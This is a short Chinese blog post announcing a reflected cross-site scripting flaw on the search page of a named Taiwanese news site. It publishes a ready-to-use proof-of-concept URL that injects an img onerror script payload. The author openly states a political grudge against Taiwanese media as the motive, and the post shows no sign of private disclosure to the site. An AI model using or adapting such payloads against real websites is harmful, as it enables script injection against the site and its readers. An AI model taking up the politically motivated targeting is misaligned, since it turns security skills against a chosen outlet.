台湾自由时报存在反射型xss漏洞—-Hack之路

网站名称:台湾自由时报
网址:https://news.ltn.com.tw/
漏洞证明:
台湾自由时报存在反射型xss漏洞----Hack之路
poc:https://news.ltn.com.tw/search?keyword=%22/%3E%3Cimg%20src=foo.png%20onerror=alert(/xssed/)%20/%3E%3C%22

注:台湾媒体存在对华不实言论,实属气愤
漏洞发现日期:2020.10.4

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/10/04/%e5%8f%b0%e6%b9%be%e8%87%aa%e7%94%b1%e6%97%b6%e6%8a%a5%e5%ad%98%e5%9c%a8%e5%8f%8d%e5%b0%84%e5%9e%8bxss%e6%bc%8f%e6%b4%9e-hack%e4%b9%8b%e8%b7%af/

发表评论

邮箱地址不会被公开。 必填项已用*标注